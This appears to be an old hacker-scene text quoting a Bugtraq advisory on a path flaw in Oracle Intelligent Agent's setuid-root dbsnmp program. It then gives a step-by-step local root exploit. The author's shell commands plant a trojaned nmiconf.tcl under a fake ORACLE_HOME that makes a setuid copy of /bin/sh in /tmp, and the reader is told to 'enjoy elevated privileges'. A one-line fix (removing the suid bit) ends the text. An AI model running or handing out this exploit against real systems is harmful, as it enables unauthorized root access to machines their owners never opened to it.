Oracle installations with the 'Oracle Intelligent Agent' installed have a path related vulnerability. The problem lies in the dbsnmp program located in $ORACLE_HOME/bin . This setuid root program calls a tcl script (nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The problem is that the dbsnmp script relies on an environment variable (the path to nmiconf.tcl) which can be a set by a user. Therefore, intruders can force the script to execute a trojaned version of nmiconf.tcl which will run as root.
0f333e0cee58f483618cb5b045cda5dd5f3845e5f50149416ee043fd7957d53a
START OF BUGTRAQ POST
Oracle installations with the 'Oracle Intelligent Agent' installed have a
path related vulnerability. The problem lies in the dbsnmp program located
in $ORACLE_HOME/bin . This setuid root program calls a tcl script
(nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The
problem is that the dbsnmp script relies on an environment variable (the
path to nmiconf.tcl) which can be a set by a user. Therefore, intruders
can force the script to execute a trojaned version of nmiconf.tcl which
will run as root.
END OF BUGTRAQ POST
apparently, as we see from above, $ORACLE_HOME would need to be reset for
this exploit to work properly. so lets do it.
first of all, drop to a bourne or korn shell and do the following:
-------
echo "cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh" > /tmp/.12345
mkdir -p /tmp/whatever/network/agent/config
export $ORACLE_HOME=/tmp/whatever
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ system "/tmp/.12345" ]
EOF
# or even an exec call instead of system... whatever...
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ exec /tmp/.12345 ]
EOF
-------
mileage may vary widely with your OS and tcl version,
so this is merely a template of the process involved...
however all one needs to do to make this a reality
is run the OLD dbsnmp program and you will spawn a
root shell in /tmp called /tmp/.sh
execute the root shell and enjoy elevated privileges.
NOW FOR THE FIX: turn OFF the suid bit on the dbsnmp executable.
theres no reason to have it set in the first place as root should
be the only user really to allow an SNMP paradigm to run anyways.
duh
" ...it takes a good man to beat me... it just doesnt take very long."
.|.. ..|.
mujahadin
no extra charge for typos